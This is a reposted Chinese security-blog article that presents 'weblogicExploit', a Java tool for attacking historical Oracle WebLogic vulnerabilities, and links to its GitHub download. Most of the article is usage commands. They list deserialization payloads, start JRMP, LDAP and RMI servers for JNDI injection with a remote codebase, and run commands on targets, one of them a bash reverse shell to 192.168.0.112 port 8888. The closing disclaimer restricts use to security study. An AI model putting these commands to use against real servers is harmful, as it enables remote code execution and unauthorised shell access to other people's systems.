weblogic历史漏洞利用工具 -- weblogicExploit

weblogic历史漏洞利用工具 -- weblogicExploit
2022-11-29 10:2:7 Author: mp.weixin.qq.com(查看原文) 阅读量:19 收藏

一、工具介绍

工具部分代码借鉴前辈的weblogic_cmd,属于二次再造轮子，部分功能暂未完善,后续将继续往上加功能。

二、安装与使用

1、列出可控payloads

java -jar weblogic.jar -payloads

2、启动JRMPListener

java -jar weblogic.jar -Jport 8888 -payload cc6 -c calc.exe

3、启动LDAP/RMI

LDAPjava -jar weblogic.jar -jndistart -Jport 8888 -jndildap -codeurl http://127.0.0.1/#wlc618RMIjava -jar weblogic.jar -jndistart -Jport 8888 -jndirmi -codeurl http://127.0.0.1/

4、高版本jndi注入 ldap

java -jar weblogic\ tools.jar -jndistart -Jport 9922 -jndildap -highjdk -os linux -c 'open /System/Applications/Calculator.app'

java -jar weblogic\ tools.jar -jndistart -Jport 9922 -jndildap -highjdk -os linux -c 'bash -i >& /dev/tcp/192.168.0.112/8888 0>&1'

三、下载地址：

https://github.com/8ypass/weblogicExploit

文章来源：系统安全运维

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！

如侵权请私聊我们删文

END

多一个点在看多一条小鱼干

文章来源: https://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650557239&idx=4&sn=e0c1976b014adc55f22607b04dc2335c&chksm=83bd2ed3b4caa7c58cedf5474b84e940a9f827a2fde7105bebf2df096f56ad0acf86e61bbcae#rd
如有侵权请联系:admin#unsafe.sh